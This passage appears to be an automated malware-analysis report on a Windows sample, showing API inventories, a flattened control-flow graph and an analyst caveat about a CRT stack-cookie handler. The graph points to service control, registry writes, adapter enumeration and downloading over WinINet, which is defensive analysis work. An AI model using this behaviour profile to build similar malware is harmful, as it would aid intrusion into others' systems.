Shell: SHGetSpecialFolderPathA (2bc5362)
Threading/sync: CreateThread (2bd33de), ResumeThread, CreateEventA, OpenEventA, SetEvent, ResetEvent, WaitForSingleObject, CloseHandle, RtlEnterCriticalSection/RtlLeaveCriticalSection, RtlDeleteCriticalSection, InitializeCriticalSectionAndSpinCount, InterlockedExchange, InterlockedCompareExchange, TlsAlloc/TlsGetValue/TlsSetValue/TlsFree, Sleep, GetCurrentProcessId, GetCurrentThreadId, RtlExitUserThread
Loader/memory/CRT support: LoadLibraryExA (4025d4), LoadLibraryExW, GetProcAddress, GetModuleHandleExW, GetModuleFileNameW, GetProcessHeap, RtlAllocateHeap, HeapFree, RtlEncodePointer, RtlDecodePointer, GetStdHandle, WriteFile, GetOEMCP, GetACP, GetLastError, SetLastError, RaiseException, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess

Most other node labels are statically linked MSVC CRT internals (__getptd, __lock, __NMSG_WRITE, __invoke_watson, _malloc/_free, __CxxThrowException@8, std::exception, shared_ptr, _strtok, __output_l, _threadstartex) rather than sample logic.

Caveat on the IsDebuggerPresent signature listed above: the only IsDebuggerPresent node (2bd951e) sits between IsProcessorFeaturePresent (2bd4535) and ___raise_securityfailure (2bd9533), which leads to SetUnhandledExceptionFilter/UnhandledExceptionFilter (2bd9508) and GetCurrentProcess/TerminateProcess (2bd94f3). That is the layout of the CRT's /GS stack-cookie failure handler, so this graph fragment by itself does not show a deliberate debugger check; confirm against the API-call trace before treating it as anti-analysis behaviour.
2bdf7c7 20951->20953 20952->20933 20954 2bd4ed5 __write_nolock 9 API calls 20953->20954 20954->20952 20956 2bd8a94 __malloc_crt 59 API calls 20955->20956 20957 2bdf95a 20956->20957 20957->20923 20959 2bd9e41 __mtinitlocknum 20958->20959 20960 2bd9e4e 20959->20960 20961 2bd9e65 20959->20961 20962 2bd5e07 __chsize_nolock 59 API calls 20960->20962 20963 2bd9f04 20961->20963 20965 2bd9e79 20961->20965 20964 2bd9e53 20962->20964 20966 2bd5e07 __chsize_nolock 59 API calls 20963->20966 20967 2bd5e3b __chsize_nolock 59 API calls 20964->20967 20968 2bd9e97 20965->20968 20969 2bd9ea1 20965->20969 20974 2bd9e9c 20966->20974 20983 2bd9e5a __mtinitlocknum 20967->20983 20971 2bd5e07 __chsize_nolock 59 API calls 20968->20971 21011 2be0c67 20969->21011 20971->20974 20972 2bd5e3b __chsize_nolock 59 API calls 20975 2bd9f10 20972->20975 20973 2bd9ea7 20976 2bd9ecd 20973->20976 20977 2bd9eba 20973->20977 20974->20972 20978 2bd4ed5 __write_nolock 9 API calls 20975->20978 20980 2bd5e3b __chsize_nolock 59 API calls 20976->20980 21020 2bd9f24 20977->21020 20978->20983 20982 2bd9ed2 20980->20982 20981 2bd9ec6 21079 2bd9efc 20981->21079 20984 2bd5e07 __chsize_nolock 59 API calls 20982->20984 20983->20929 20984->20981 20987 2bdf7e2 __mtinitlocknum 20986->20987 20988 2bdf80b 20987->20988 20989 2bdf7f3 20987->20989 20991 2bdf8b0 20988->20991 20995 2bdf840 20988->20995 20990 2bd5e07 __chsize_nolock 59 API calls 20989->20990 20993 2bdf7f8 20990->20993 20992 2bd5e07 __chsize_nolock 59 API calls 20991->20992 20994 2bdf8b5 20992->20994 20996 2bd5e3b __chsize_nolock 59 API calls 20993->20996 20997 2bd5e3b __chsize_nolock 59 API calls 20994->20997 20998 2be0c67 ___lock_fhandle 60 API calls 20995->20998 21005 2bdf800 __mtinitlocknum 20996->21005 20999 2bdf8bd 20997->20999 21000 2bdf846 20998->21000 21001 2bd4ed5 __write_nolock 9 API calls 20999->21001 21002 2bdf85c 21000->21002 21003 2bdf874 21000->21003 21001->21005 21004 2bdf8d2 __lseeki64_nolock 61 API calls 21002->21004 21006 2bd5e3b 
__chsize_nolock 59 API calls 21003->21006 21007 2bdf86b 21004->21007 21005->20929 21008 2bdf879 21006->21008 21112 2bdf8a8 21007->21112 21009 2bd5e07 __chsize_nolock 59 API calls 21008->21009 21009->21007 21012 2be0c73 __mtinitlocknum 21011->21012 21013 2be0cc2 RtlEnterCriticalSection 21012->21013 21014 2bd88cd __lock 59 API calls 21012->21014 21015 2be0ce8 __mtinitlocknum 21013->21015 21016 2be0c98 21014->21016 21015->20973 21017 2be0cb0 21016->21017 21019 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 21016->21019 21082 2be0cec 21017->21082 21019->21017 21021 2bd9f31 __write_nolock 21020->21021 21022 2bd9f8f 21021->21022 21023 2bd9f70 21021->21023 21055 2bd9f65 21021->21055 21028 2bd9fe7 21022->21028 21029 2bd9fcb 21022->21029 21024 2bd5e07 __chsize_nolock 59 API calls 21023->21024 21027 2bd9f75 21024->21027 21025 2bd452b __except_handler4 6 API calls 21026 2bda785 21025->21026 21026->20981 21030 2bd5e3b __chsize_nolock 59 API calls 21027->21030 21031 2bda000 21028->21031 21086 2bdf8d2 21028->21086 21032 2bd5e07 __chsize_nolock 59 API calls 21029->21032 21033 2bd9f7c 21030->21033 21035 2bdf782 __write_nolock 59 API calls 21031->21035 21036 2bd9fd0 21032->21036 21037 2bd4ed5 __write_nolock 9 API calls 21033->21037 21038 2bda00e 21035->21038 21039 2bd5e3b __chsize_nolock 59 API calls 21036->21039 21037->21055 21040 2bda367 21038->21040 21045 2bd5c3a FindHandler 59 API calls 21038->21045 21041 2bd9fd7 21039->21041 21043 2bda6fa WriteFile 21040->21043 21044 2bda385 21040->21044 21042 2bd4ed5 __write_nolock 9 API calls 21041->21042 21042->21055 21046 2bda35a GetLastError 21043->21046 21057 2bda327 21043->21057 21047 2bda4a9 21044->21047 21054 2bda39b 21044->21054 21050 2bda03a GetConsoleMode 21045->21050 21046->21057 21048 2bda59e 21047->21048 21049 2bda4b4 21047->21049 21051 2bda733 21048->21051 21048->21057 21061 2bda613 WideCharToMultiByte 21048->21061 21068 2bda662 WriteFile 21048->21068 21049->21051 21049->21057 21062 2bda519 WriteFile 21049->21062 
21050->21040 21052 2bda079 21050->21052 21051->21055 21056 2bd5e3b __chsize_nolock 59 API calls 21051->21056 21052->21040 21058 2bda089 GetConsoleCP 21052->21058 21053 2bda40a WriteFile 21053->21046 21053->21054 21054->21051 21054->21053 21054->21057 21055->21025 21059 2bda761 21056->21059 21057->21051 21057->21055 21060 2bda487 21057->21060 21058->21051 21074 2bda0b8 21058->21074 21063 2bd5e07 __chsize_nolock 59 API calls 21059->21063 21064 2bda72a 21060->21064 21065 2bda492 21060->21065 21061->21046 21061->21048 21062->21046 21062->21049 21063->21055 21066 2bd5e1a __dosmaperr 59 API calls 21064->21066 21067 2bd5e3b __chsize_nolock 59 API calls 21065->21067 21066->21055 21069 2bda497 21067->21069 21068->21048 21071 2bda6b5 GetLastError 21068->21071 21072 2bd5e07 __chsize_nolock 59 API calls 21069->21072 21071->21048 21072->21055 21073 2be1033 WriteConsoleW CreateFileW __putwch_nolock 21073->21074 21074->21046 21074->21057 21074->21073 21075 2bda1a1 WideCharToMultiByte 21074->21075 21076 2bdffea 61 API calls __write_nolock 21074->21076 21078 2bda236 WriteFile 21074->21078 21095 2bddd28 21074->21095 21075->21057 21077 2bda1dc WriteFile 21075->21077 21076->21074 21077->21046 21077->21074 21078->21046 21078->21074 21111 2be100d RtlLeaveCriticalSection 21079->21111 21081 2bd9f02 21081->20983 21085 2bd8a37 RtlLeaveCriticalSection 21082->21085 21084 2be0cf3 21084->21013 21085->21084 21098 2be0f24 21086->21098 21088 2bdf8e2 21089 2bdf8fb SetFilePointerEx 21088->21089 21090 2bdf8ea 21088->21090 21092 2bdf913 GetLastError 21089->21092 21093 2bdf8ef 21089->21093 21091 2bd5e3b __chsize_nolock 59 API calls 21090->21091 21091->21093 21094 2bd5e1a __dosmaperr 59 API calls 21092->21094 21093->21031 21094->21093 21096 2bddcee __isleadbyte_l 59 API calls 21095->21096 21097 2bddd35 21096->21097 21097->21074 21099 2be0f2f 21098->21099 21100 2be0f44 21098->21100 21101 2bd5e07 __chsize_nolock 59 API calls 21099->21101 21103 2bd5e07 __chsize_nolock 59 API calls 21100->21103 21105 
2be0f69 21100->21105 21102 2be0f34 21101->21102 21104 2bd5e3b __chsize_nolock 59 API calls 21102->21104 21106 2be0f73 21103->21106 21108 2be0f3c 21104->21108 21105->21088 21107 2bd5e3b __chsize_nolock 59 API calls 21106->21107 21109 2be0f7b 21107->21109 21108->21088 21110 2bd4ed5 __write_nolock 9 API calls 21109->21110 21110->21108 21111->21081 21115 2be100d RtlLeaveCriticalSection 21112->21115 21114 2bdf8ae 21114->21005 21115->21114 21116->19975 21118 2bce310 __EH_prolog 21117->21118 21119 2bd3b2c _Allocate 60 API calls 21118->21119 21120 2bce319 21119->21120 21121 2bc1bfa RtlEnterCriticalSection 21120->21121 21123 2bce527 21120->21123 21121->19980 21124 2bce531 __EH_prolog 21123->21124 21127 2bc26db RtlEnterCriticalSection 21124->21127 21126 2bce587 21126->21121 21128 2bc277e 21127->21128 21129 2bc2728 CreateWaitableTimerA 21127->21129 21132 2bc27d5 RtlLeaveCriticalSection 21128->21132 21134 2bd3b2c _Allocate 60 API calls 21128->21134 21130 2bc2738 GetLastError 21129->21130 21131 2bc275b SetWaitableTimer 21129->21131 21133 2bd0af0 Mailbox 68 API calls 21130->21133 21131->21128 21132->21126 21135 2bc2745 21133->21135 21138 2bc278a 21134->21138 21136 2bc1712 60 API calls 21135->21136 21136->21131 21137 2bc27c8 21171 2bc7dd9 21137->21171 21138->21137 21139 2bd3b2c _Allocate 60 API calls 21138->21139 21141 2bc27a9 21139->21141 21143 2bc1cf8 CreateEventA 21141->21143 21144 2bc1d52 CreateEventA 21143->21144 21145 2bc1d23 GetLastError 21143->21145 21146 2bc1d96 21144->21146 21147 2bc1d6b GetLastError 21144->21147 21149 2bc1d33 21145->21149 21148 2bd3399 __beginthreadex 275 API calls 21146->21148 21150 2bc1d7b 21147->21150 21151 2bc1db6 21148->21151 21152 2bd0af0 Mailbox 68 API calls 21149->21152 21153 2bd0af0 Mailbox 68 API calls 21150->21153 21154 2bc1e0d 21151->21154 21155 2bc1dc6 GetLastError 21151->21155 21156 2bc1d3c 21152->21156 21157 2bc1d84 21153->21157 21158 2bc1e1d 21154->21158 21159 2bc1e11 WaitForSingleObject CloseHandle 21154->21159 21162 2bc1dd8 
21155->21162 21160 2bc1712 60 API calls 21156->21160 21161 2bc1712 60 API calls 21157->21161 21158->21137 21159->21158 21163 2bc1d4e 21160->21163 21161->21146 21164 2bc1ddc CloseHandle 21162->21164 21165 2bc1ddf 21162->21165 21163->21144 21164->21165 21166 2bc1dee 21165->21166 21167 2bc1de9 CloseHandle 21165->21167 21168 2bd0af0 Mailbox 68 API calls 21166->21168 21167->21166 21169 2bc1dfb 21168->21169 21170 2bc1712 60 API calls 21169->21170 21170->21154 21172 2bc7de6 CloseHandle 21171->21172 21173 2bc7df5 21171->21173 21172->21173 21173->21132 21185 2bc30ae WSASetLastError 21174->21185 21177 2bc3c90 21179 2bc16ae 21177->21179 21178 2bc30ae 71 API calls 21178->21177 21180 2bc16b8 __EH_prolog 21179->21180 21181 2bc1701 21180->21181 21182 2bd24b3 std::exception::exception 59 API calls 21180->21182 21181->19831 21183 2bc16dc 21182->21183 21201 2bca478 21183->21201 21186 2bc30ec WSAStringToAddressA 21185->21186 21187 2bc30ce 21185->21187 21189 2bca4df 69 API calls 21186->21189 21187->21186 21188 2bc30d3 21187->21188 21191 2bd0af0 Mailbox 68 API calls 21188->21191 21190 2bc3114 21189->21190 21192 2bc3154 21190->21192 21197 2bc311e _memcmp 21190->21197 21200 2bc30d8 21191->21200 21193 2bc3135 21192->21193 21198 2bd0af0 Mailbox 68 API calls 21192->21198 21194 2bc3193 21193->21194 21195 2bd0af0 Mailbox 68 API calls 21193->21195 21199 2bd0af0 Mailbox 68 API calls 21194->21199 21194->21200 21195->21194 21196 2bd0af0 Mailbox 68 API calls 21196->21193 21197->21193 21197->21196 21198->21193 21199->21200 21200->21177 21200->21178 21202 2bca482 __EH_prolog 21201->21202 21209 2bcc9dd 21202->21209 21206 2bca4a3 21207 2bd453a __CxxThrowException@8 RaiseException 21206->21207 21208 2bca4b1 21207->21208 21210 2bcb204 std::bad_exception::bad_exception 60 API calls 21209->21210 21211 2bca495 21210->21211 21212 2bcca19 21211->21212 21213 2bcca23 __EH_prolog 21212->21213 21216 2bcb1b3 21213->21216 21215 2bcca52 Mailbox 21215->21206 21217 2bcb1bd __EH_prolog 21216->21217 21218 2bcb204 
std::bad_exception::bad_exception 60 API calls 21217->21218 21219 2bcb1ce Mailbox 21218->21219 21219->21215 21221 2bc3c20 __EH_prolog 21220->21221 21222 2bc3c41 21221->21222 21223 2bd2497 std::bad_exception::bad_exception 59 API calls 21221->21223 21222->19995 21224 2bc3c35 21223->21224 21225 2bca62d 60 API calls 21224->21225 21225->21222 21227 2bc3755 InterlockedCompareExchange 21226->21227 21228 2bc3770 21226->21228 21227->21228 21229 2bc3765 21227->21229 21230 2bd0af0 Mailbox 68 API calls 21228->21230 21231 2bc32ab 78 API calls 21229->21231 21232 2bc3779 21230->21232 21231->21228 21233 2bc29ee 76 API calls 21232->21233 21234 2bc378e 21233->21234 21234->19999 21264 2bd368d 21235->21264 21237 2bc53c8 21237->20012 21238 2bd38e6 21237->21238 21239 2bd38f2 __mtinitlocknum 21238->21239 21240 2bd3928 21239->21240 21241 2bd3910 21239->21241 21244 2bd3920 __mtinitlocknum 21239->21244 21406 2bd97d2 21240->21406 21243 2bd5e3b __chsize_nolock 59 API calls 21241->21243 21246 2bd3915 21243->21246 21244->20010 21248 2bd4ed5 __write_nolock 9 API calls 21246->21248 21248->21244 21252 2bd3a70 __mtinitlocknum 21251->21252 21253 2bd3a9c 21252->21253 21254 2bd3a84 21252->21254 21257 2bd97d2 __lock_file 60 API calls 21253->21257 21260 2bd3a94 __mtinitlocknum 21253->21260 21255 2bd5e3b __chsize_nolock 59 API calls 21254->21255 21256 2bd3a89 21255->21256 21258 2bd4ed5 __write_nolock 9 API calls 21256->21258 21259 2bd3aae 21257->21259 21258->21260 21433 2bd39f8 21259->21433 21260->20012 21265 2bd3699 __mtinitlocknum 21264->21265 21266 2bd36ab 21265->21266 21269 2bd36d8 21265->21269 21267 2bd5e3b __chsize_nolock 59 API calls 21266->21267 21268 2bd36b0 21267->21268 21270 2bd4ed5 __write_nolock 9 API calls 21268->21270 21283 2bd98a8 21269->21283 21280 2bd36bb __mtinitlocknum @_EH4_CallFilterFunc@8 21270->21280 21272 2bd36dd 21273 2bd36e6 21272->21273 21274 2bd36f3 21272->21274 21275 2bd5e3b __chsize_nolock 59 API calls 21273->21275 21276 2bd371c 21274->21276 21277 2bd36fc 21274->21277 
21275->21280 21298 2bd99c7 21276->21298 21278 2bd5e3b __chsize_nolock 59 API calls 21277->21278 21278->21280 21280->21237 21284 2bd98b4 __mtinitlocknum 21283->21284 21285 2bd88cd __lock 59 API calls 21284->21285 21296 2bd98c2 21285->21296 21286 2bd9936 21328 2bd99be 21286->21328 21287 2bd993d 21289 2bd8a94 __malloc_crt 59 API calls 21287->21289 21291 2bd9944 21289->21291 21290 2bd99b3 __mtinitlocknum 21290->21272 21291->21286 21292 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 21291->21292 21295 2bd996a RtlEnterCriticalSection 21292->21295 21293 2bd8955 __mtinitlocknum 59 API calls 21293->21296 21295->21286 21296->21286 21296->21287 21296->21293 21318 2bd9811 21296->21318 21323 2bd987b 21296->21323 21300 2bd99e4 21298->21300 21299 2bd99f8 21301 2bd5e3b __chsize_nolock 59 API calls 21299->21301 21300->21299 21314 2bd9b9f 21300->21314 21333 2be082e 21300->21333 21302 2bd99fd 21301->21302 21303 2bd4ed5 __write_nolock 9 API calls 21302->21303 21306 2bd3727 21303->21306 21304 2bd9bfb 21339 2be0810 21304->21339 21315 2bd3749 21306->21315 21311 2be095d __openfile 59 API calls 21312 2bd9bb7 21311->21312 21313 2be095d __openfile 59 API calls 21312->21313 21312->21314 21313->21314 21314->21299 21314->21304 21399 2bd9841 21315->21399 21317 2bd374f 21317->21280 21319 2bd981c 21318->21319 21320 2bd9832 RtlEnterCriticalSection 21318->21320 21321 2bd88cd __lock 59 API calls 21319->21321 21320->21296 21322 2bd9825 21321->21322 21322->21296 21324 2bd989c RtlLeaveCriticalSection 21323->21324 21325 2bd9889 21323->21325 21324->21296 21331 2bd8a37 RtlLeaveCriticalSection 21325->21331 21327 2bd9899 21327->21296 21332 2bd8a37 RtlLeaveCriticalSection 21328->21332 21330 2bd99c5 21330->21290 21331->21327 21332->21330 21342 2be0846 21333->21342 21335 2bd9b65 21335->21299 21336 2be095d 21335->21336 21350 2be0975 21336->21350 21338 2bd9b98 21338->21311 21338->21314 21357 2be06f9 21339->21357 21341 2be0829 21341->21306 21343 2be085b 21342->21343 21348 2be0854 21342->21348 21344 
2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 21343->21344 21345 2be0868 21344->21345 21346 2bd5e3b __chsize_nolock 59 API calls 21345->21346 21345->21348 21347 2be089b 21346->21347 21349 2bd4ed5 __write_nolock 9 API calls 21347->21349 21348->21335 21349->21348 21351 2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 21350->21351 21352 2be0988 21351->21352 21353 2bd5e3b __chsize_nolock 59 API calls 21352->21353 21356 2be099d 21352->21356 21354 2be09c9 21353->21354 21355 2bd4ed5 __write_nolock 9 API calls 21354->21355 21355->21356 21356->21338 21358 2be0705 __mtinitlocknum 21357->21358 21359 2be071b 21358->21359 21362 2be0751 21358->21362 21360 2bd5e3b __chsize_nolock 59 API calls 21359->21360 21361 2be0720 21360->21361 21363 2bd4ed5 __write_nolock 9 API calls 21361->21363 21368 2be07c2 21362->21368 21367 2be072a __mtinitlocknum 21363->21367 21367->21341 21377 2bd8216 21368->21377 21370 2be076d 21373 2be0796 21370->21373 21371 2be07d6 21371->21370 21372 2bd2f54 _free 59 API calls 21371->21372 21372->21370 21374 2be079c 21373->21374 21376 2be07c0 21373->21376 21398 2be100d RtlLeaveCriticalSection 21374->21398 21376->21367 21378 2bd8239 21377->21378 21379 2bd8223 21377->21379 21378->21379 21381 2bd8240 ___crtIsPackagedApp 21378->21381 21380 2bd5e3b __chsize_nolock 59 API calls 21379->21380 21382 2bd8228 21380->21382 21384 2bd8249 AreFileApisANSI 21381->21384 21385 2bd8256 MultiByteToWideChar 21381->21385 21383 2bd4ed5 __write_nolock 9 API calls 21382->21383 21391 2bd8232 21383->21391 21384->21385 21386 2bd8253 21384->21386 21387 2bd8281 21385->21387 21388 2bd8270 GetLastError 21385->21388 21386->21385 21390 2bd8a94 __malloc_crt 59 API calls 21387->21390 21389 2bd5e1a __dosmaperr 59 API calls 21388->21389 21389->21391 21392 2bd8289 21390->21392 21391->21371 21392->21391 21393 2bd8290 MultiByteToWideChar 21392->21393 21393->21391 21394 2bd82a6 GetLastError 21393->21394 21395 2bd5e1a __dosmaperr 59 API calls 21394->21395 21396 2bd82b2 21395->21396 21397 2bd2f54 _free 
59 API calls 21396->21397 21397->21391 21398->21376 21400 2bd986f RtlLeaveCriticalSection 21399->21400 21401 2bd9850 21399->21401 21400->21317 21401->21400 21402 2bd9857 21401->21402 21405 2bd8a37 RtlLeaveCriticalSection 21402->21405 21404 2bd986c 21404->21317 21405->21404 21407 2bd9804 RtlEnterCriticalSection 21406->21407 21408 2bd97e2 21406->21408 21410 2bd392e 21407->21410 21408->21407 21409 2bd97ea 21408->21409 21411 2bd88cd __lock 59 API calls 21409->21411 21412 2bd378d 21410->21412 21411->21410 21415 2bd379c 21412->21415 21418 2bd37ba 21412->21418 21413 2bd37aa 21414 2bd5e3b __chsize_nolock 59 API calls 21413->21414 21416 2bd37af 21414->21416 21415->21413 21415->21418 21423 2bd37d4 _memmove 21415->21423 21417 2bd4ed5 __write_nolock 9 API calls 21416->21417 21417->21418 21424 2bd3960 21418->21424 21419 2bd5ee1 __flsbuf 79 API calls 21419->21423 21421 2bd9e11 __fflush_nolock 59 API calls 21421->21423 21422 2bd9e35 __write 79 API calls 21422->21423 21423->21418 21423->21419 21423->21421 21423->21422 21427 2bda7cf 21423->21427 21425 2bd9841 __fsopen 2 API calls 21424->21425 21426 2bd3966 21425->21426 21426->21244 21428 2bda7e2 21427->21428 21429 2bda806 21427->21429 21428->21429 21430 2bd9e11 __fflush_nolock 59 API calls 21428->21430 21429->21423 21431 2bda7ff 21430->21431 21432 2bd9e35 __write 79 API calls 21431->21432 21432->21429 21434 2bd3a07 21433->21434 21436 2bd3a1b 21433->21436 21437 2bd5e3b __chsize_nolock 59 API calls 21434->21437 21435 2bd3a17 21449 2bd3ad3 21435->21449 21436->21435 21438 2bda7cf __flush 79 API calls 21436->21438 21439 2bd3a0c 21437->21439 21440 2bd3a27 21438->21440 21441 2bd4ed5 __write_nolock 9 API calls 21439->21441 21452 2bdb27b 21440->21452 21441->21435 21444 2bd9e11 __fflush_nolock 59 API calls 21445 2bd3a35 21444->21445 21456 2bdb106 21445->21456 21447 2bd3a3b 21447->21435 21448 2bd2f54 _free 59 API calls 21447->21448 21448->21435 21450 2bd9841 __fsopen 2 API calls 21449->21450 21451 2bd3ad9 21450->21451 21451->21260 21453 
2bd3a2f 21452->21453 21454 2bdb288 21452->21454 21453->21444 21454->21453 21455 2bd2f54 _free 59 API calls 21454->21455 21455->21453 21457 2bdb112 __mtinitlocknum 21456->21457 21458 2bdb11f 21457->21458 21459 2bdb136 21457->21459 21460 2bd5e07 __chsize_nolock 59 API calls 21458->21460 21461 2bdb1c1 21459->21461 21462 2bdb146 21459->21462 21464 2bdb124 21460->21464 21463 2bd5e07 __chsize_nolock 59 API calls 21461->21463 21465 2bdb16e 21462->21465 21466 2bdb164 21462->21466 21467 2bdb169 21463->21467 21468 2bd5e3b __chsize_nolock 59 API calls 21464->21468 21470 2be0c67 ___lock_fhandle 60 API calls 21465->21470 21469 2bd5e07 __chsize_nolock 59 API calls 21466->21469 21472 2bd5e3b __chsize_nolock 59 API calls 21467->21472 21471 2bdb12b __mtinitlocknum 21468->21471 21469->21467 21473 2bdb174 21470->21473 21471->21447 21474 2bdb1cd 21472->21474 21475 2bdb187 21473->21475 21476 2bdb192 21473->21476 21477 2bd4ed5 __write_nolock 9 API calls 21474->21477 21482 2bdb1e1 21475->21482 21479 2bd5e3b __chsize_nolock 59 API calls 21476->21479 21477->21471 21480 2bdb18d 21479->21480 21497 2bdb1b9 21480->21497 21483 2be0f24 __chsize_nolock 59 API calls 21482->21483 21485 2bdb1ef 21483->21485 21484 2bdb245 21500 2be0e9e 21484->21500 21485->21484 21487 2bdb223 21485->21487 21490 2be0f24 __chsize_nolock 59 API calls 21485->21490 21487->21484 21488 2be0f24 __chsize_nolock 59 API calls 21487->21488 21491 2bdb22f CloseHandle 21488->21491 21493 2bdb21a 21490->21493 21491->21484 21494 2bdb23b GetLastError 21491->21494 21492 2bdb26f 21492->21480 21496 2be0f24 __chsize_nolock 59 API calls 21493->21496 21494->21484 21495 2bd5e1a __dosmaperr 59 API calls 21495->21492 21496->21487 21509 2be100d RtlLeaveCriticalSection 21497->21509 21499 2bdb1bf 21499->21471 21501 2be0f0a 21500->21501 21502 2be0eaa 21500->21502 21503 2bd5e3b __chsize_nolock 59 API calls 21501->21503 21502->21501 21508 2be0ed3 21502->21508 21504 2be0f0f 21503->21504 21505 2bd5e07 __chsize_nolock 59 API calls 21504->21505 21506 
2bdb24d 21505->21506 21506->21492 21506->21495 21507 2be0ef5 SetStdHandle 21507->21506 21508->21506 21508->21507 21509->21499 21510 2c2f515 21511 2c32987 ReadFile 21510->21511 21918 2bc648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 21919 2bc64f3 GetTickCount 21918->21919 21996 2bc42c7 21918->21996 21997 2bc605a 21919->21997 21998 2bd2f8c _malloc 59 API calls 21997->21998 21999 2bc606d 21998->21999 21513 402858 OpenSCManagerA 21514 402199 lstrcmpiW 21515 402323 21514->21515 21516 40d761 lstrcmpiW 21515->21516 21517 402170 21515->21517 21516->21517 21518 40d9c9 21517->21518 21519 40d159 StartServiceCtrlDispatcherA 21517->21519 21519->21517 22000 4026ba 22001 4026bf VirtualAlloc 22000->22001 22003 40d8a7 22001->22003 22004 2bfe004 22007 2bcf879 CreateFileA 22004->22007 22008 2bcf975 22007->22008 22011 2bcf8aa 22007->22011 22009 2bcf8c2 DeviceIoControl 22009->22011 22010 2bcf96b CloseHandle 22010->22008 22011->22009 22011->22010 22012 2bcf937 GetLastError 22011->22012 22013 2bd3b2c _Allocate 60 API calls 22011->22013 22012->22010 22012->22011 22013->22011 21520 40d19e 21521 40d52a RegCreateKeyExA 21520->21521 21522 40d538 21521->21522 21523 40279f GetCommandLineW 21524 402895 CommandLineToArgvW 21523->21524 21525 40d9fe GetLocalTime 21524->21525 21528 401f27 21525->21528 21529 401f3c 21528->21529 21532 401a1d 21529->21532 21531 401f45 21533 401a2c 21532->21533 21538 401a4f CreateFileA 21533->21538 21537 401a3e 21537->21531 21539 401a35 21538->21539 21544 401a7d 21538->21544 21546 401b4b LoadLibraryA 21539->21546 21540 401a98 DeviceIoControl 21540->21544 21542 401b3a CloseHandle 21542->21539 21543 401b0e GetLastError 21543->21542 21543->21544 21544->21540 21544->21542 21544->21543 21555 402ca6 21544->21555 21558 402c98 21544->21558 21547 401c21 21546->21547 21548 401b6e GetProcAddress 21546->21548 21547->21537 21549 401c18 FreeLibrary 21548->21549 21553 401b85 21548->21553 21549->21547 21550 401b95 GetAdaptersInfo 
21550->21553 21551 402ca6 7 API calls 21551->21553 21552 401c15 21552->21549 21553->21550 21553->21551 21553->21552 21554 402c98 12 API calls 21553->21554 21554->21553 21561 4030a1 21555->21561 21591 403001 21558->21591 21562 4030ad 21561->21562 21570 402caf 21561->21570 21563 4030b7 21562->21563 21567 4030cd 21562->21567 21565 4030f9 HeapFree 21563->21565 21566 4030c3 21563->21566 21564 4030f8 21564->21565 21565->21570 21572 40443e 21566->21572 21567->21564 21569 4030e7 21567->21569 21578 404ecf 21569->21578 21570->21544 21573 40447c 21572->21573 21577 404732 21572->21577 21574 404678 VirtualFree 21573->21574 21573->21577 21575 4046dc 21574->21575 21576 4046eb VirtualFree HeapFree 21575->21576 21575->21577 21576->21577 21577->21570 21579 404f12 21578->21579 21580 404efc 21578->21580 21579->21570 21580->21579 21582 404db6 21580->21582 21585 404dc3 21582->21585 21583 404e73 21583->21579 21584 404de4 VirtualFree 21584->21585 21585->21583 21585->21584 21587 404d60 VirtualFree 21585->21587 21588 404d7d 21587->21588 21589 404dad 21588->21589 21590 404d8d HeapFree 21588->21590 21589->21585 21590->21585 21592 402ca3 21591->21592 21594 403008 21591->21594 21592->21544 21594->21592 21595 40302d 21594->21595 21596 40303c 21595->21596 21601 403051 21595->21601 21603 40304a 21596->21603 21604 404767 21596->21604 21598 403090 HeapAlloc 21599 40309f 21598->21599 21599->21594 21600 40304f 21600->21594 21601->21598 21601->21603 21610 404f14 21601->21610 21603->21598 21603->21599 21603->21600 21605 404799 21604->21605 21606 404838 21605->21606 21609 404847 21605->21609 21617 404a70 21605->21617 21606->21609 21624 404b21 21606->21624 21609->21603 21611 404f22 21610->21611 21612 40500e VirtualAlloc 21611->21612 21613 4050e3 21611->21613 21616 404fdf 21611->21616 21612->21616 21628 404c1c 21613->21628 21616->21603 21618 404ab3 HeapAlloc 21617->21618 21619 404a83 HeapReAlloc 21617->21619 21621 404b03 21618->21621 21622 404ad9 VirtualAlloc 21618->21622 21620 404aa2 21619->21620 
21619->21621 21620->21618 21621->21606 21622->21621 21623 404af3 HeapFree 21622->21623 21623->21621 21625 404b33 VirtualAlloc 21624->21625 21627 404b7c 21625->21627 21627->21609 21629 404c30 HeapAlloc 21628->21629 21630 404c29 21628->21630 21631 404c4d VirtualAlloc 21629->21631 21636 404c85 21629->21636 21630->21631 21632 404d42 21631->21632 21633 404c6d VirtualAlloc 21631->21633 21634 404d4a HeapFree 21632->21634 21632->21636 21635 404d34 VirtualFree 21633->21635 21633->21636 21634->21636 21635->21632 21636->21616

Control-flow Graph: function starting at 2bc72ab (InternetOpenA)
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02BC6708
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC6713
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC6724
                                                                                                      • _memset.LIBCMT ref: 02BC6779
                                                                                                      • _memset.LIBCMT ref: 02BC6788
                                                                                                      • InternetOpenA.WININET(?), ref: 02BC72B5
                                                                                                      • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02BC72DD
                                                                                                      • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02BC72F5
                                                                                                      • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02BC730D
                                                                                                      • _memset.LIBCMT ref: 02BC731D
                                                                                                      • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02BC7336
                                                                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02BC7358
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02BC7378
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02BC7383
                                                                                                      • _memset.LIBCMT ref: 02BC73CB
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC73EE
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC73FF
                                                                                                      • _malloc.LIBCMT ref: 02BC7498
